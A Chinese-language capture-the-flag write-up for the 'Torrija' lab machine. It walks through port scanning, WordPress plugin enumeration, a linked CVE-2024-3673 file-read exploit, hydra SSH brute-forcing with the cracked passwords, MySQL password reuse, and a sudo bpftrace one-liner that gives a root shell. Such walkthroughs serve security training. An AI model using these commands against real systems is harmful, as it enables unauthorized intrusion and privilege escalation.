Torrijas

image

信息搜集

192.168.43.42

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(root㉿kali)-[~]
└─# rustscan -a 192.168.43.42 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Because guessing isn't hacking.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.43.42:22
Open 192.168.43.42:80
Open 192.168.43.42:3306
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-08 09:02 EDT
Initiating Ping Scan at 09:02
Scanning 192.168.43.42 [4 ports]
Completed Ping Scan at 09:02, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:02
Completed Parallel DNS resolution of 1 host. at 09:02, 0.32s elapsed
DNS resolution of 1 IPs took 0.32s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 09:02
Scanning 192.168.43.42 [3 ports]
Discovered open port 3306/tcp on 192.168.43.42
Discovered open port 22/tcp on 192.168.43.42
Discovered open port 80/tcp on 192.168.43.42
Completed SYN Stealth Scan at 09:02, 0.03s elapsed (3 total ports)
Nmap scan report for 192.168.43.42
Host is up, received reset ttl 128 (0.00058s latency).
Scanned at 2026-04-08 09:02:20 EDT for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 128
80/tcp   open  http    syn-ack ttl 128
3306/tcp open  mysql   syn-ack ttl 128

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds
           Raw packets sent: 7 (284B) | Rcvd: 4 (172B)

枚举

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.43.42/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,wsp,py,js,phps --exclude-length 278
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.43.42/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Exclude Length:          278
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,wsp,py,js,phps,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 20833]
/images               (Status: 301) [Size: 315] [--> http://192.168.43.42/images/]
/contact.html         (Status: 200) [Size: 7285]
/about.html           (Status: 200) [Size: 5574]
/css                  (Status: 301) [Size: 312] [--> http://192.168.43.42/css/]
/wordpress            (Status: 301) [Size: 318] [--> http://192.168.43.42/wordpress/]
/js                   (Status: 301) [Size: 311] [--> http://192.168.43.42/js/]
/recipes.html         (Status: 200) [Size: 7565]
/testimonial.html     (Status: 200) [Size: 8901]
Progress: 1764480 / 1764488 (100.00%)
===============================================================
Finished
===============================================================

可以发现有一个wordpress

使用wpscan枚举可以利用的插件

wp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
┌──(root㉿kali)-[~]
└─# wpscan --url http://192.168.43.42/wordpress/ --enumerate ap --plugins-detection aggressive            
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
 


[+] URL: http://192.168.43.42/wordpress/ [192.168.43.42]
[+] Started: Wed Apr  8 09:18:15 2026

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.62 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.43.42/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.43.42/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.43.42/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.43.42/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.2 identified (Outdated, released on 2025-02-11).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.43.42/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.2'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.43.42/wordpress/, Match: 'WordPress 6.7.2'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:00:56 <===========================================================================================> (111886 / 111886) 100.00% Time: 00:00:56
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.43.42/wordpress/wp-content/plugins/akismet/
 | Last Updated: 2025-07-15T18:17:00.000Z
 | Readme: http://192.168.43.42/wordpress/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.5
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.43.42/wordpress/wp-content/plugins/akismet/, status: 200
 |
 | Version: 5.3.6 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.43.42/wordpress/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.43.42/wordpress/wp-content/plugins/akismet/readme.txt

[+] web-directory-free
 | Location: http://192.168.43.42/wordpress/wp-content/plugins/web-directory-free/
 | Last Updated: 2025-04-16T16:43:00.000Z
 | Readme: http://192.168.43.42/wordpress/wp-content/plugins/web-directory-free/readme.txt
 | [!] The version is out of date, the latest version is 1.7.10
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.43.42/wordpress/wp-content/plugins/web-directory-free/, status: 200
 |
 | Version: 1.7.2 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.43.42/wordpress/wp-content/plugins/web-directory-free/readme.txt

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Apr  8 09:19:18 2026
[+] Requests Done: 111896
[+] Cached Requests: 32
[+] Data Sent: 32.397 MB
[+] Data Received: 15 MB
[+] Memory used: 398.43 MB
[+] Elapsed time: 00:01:02

存在两个插件akismet和web-directory-free其中web-directory-free的版本version is 1.7.10存在CVE漏洞CVE-2024-3673

下载exp https://github.com/Nxploited/CVE-2024-3673/blob/main/CVE-2024-3673.py

读取/etc/passwd

image

home下面一共三个用户,hydra尝试爆破ssh一下

primo

debian

premo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[/opt/CVE]
└─# hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.43.42 ssh -t 64    
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-04-08 09:41:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 43033197 login tries (l:3/p:14344399), ~672394 tries per task
[DATA] attacking ssh://192.168.43.42:22/
[STATUS] 549.00 tries/min, 549 tries in 00:01h, 43032690 to do in 1306:24h, 22 active
[22][ssh] host: 192.168.43.42   login: premo   password: cassandra
[STATUS] 4781545.67 tries/min, 14344637 tries in 00:03h, 28688602 to do in 00:06h, 22 active
[STATUS] 2049385.14 tries/min, 14345696 tries in 00:07h, 28687550 to do in 00:14h, 15 active
[STATUS] 1195585.58 tries/min, 14347027 tries in 00:12h, 28686219 to do in 00:24h, 15 active

其中user.txt是三个用户名

premo:cassandra

提权

premo -> primo

1
ssh premo@192.168.43.42

在premo用户家目录下,可以看到有mysql历史记录,登录mysql需要用户名和密码

image

查看/var/www/html/wordpress/wp-config.php获取到数据库用户名和密码

image

登录到mysql

1
mysql -uadmin -pafdvasgvfdsabdgvs6a9vd8sv

没发现有其他的都是一些wp的数据库

考虑是不是密码复用尝试root用户名发现可以登录

1
mysql -uroot -pafdvasgvfdsabdgvs6a9vd8sv

image

image

得到了primo的用户密码

primo:queazeshurmano

primo -> root

1
2
3
4
5
6
7
primo@Torrija-TheHackersLabs:/home/premo$ sudo -l
sudo: unable to resolve host Torrija-TheHackersLabs: Nombre o servicio desconocido
Matching Defaults entries for primo on Torrija-TheHackersLabs:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User primo may run the following commands on Torrija-TheHackersLabs:
    (root) NOPASSWD: /usr/bin/bpftrace

可以使用bpftrace提权

https://gtfobins.org/gtfobins/bpftrace/​​

1
sudo /usr/bin/bpftrace --unsafe -e 'BEGIN {system("/bin/sh 1<&0");exit()}'

image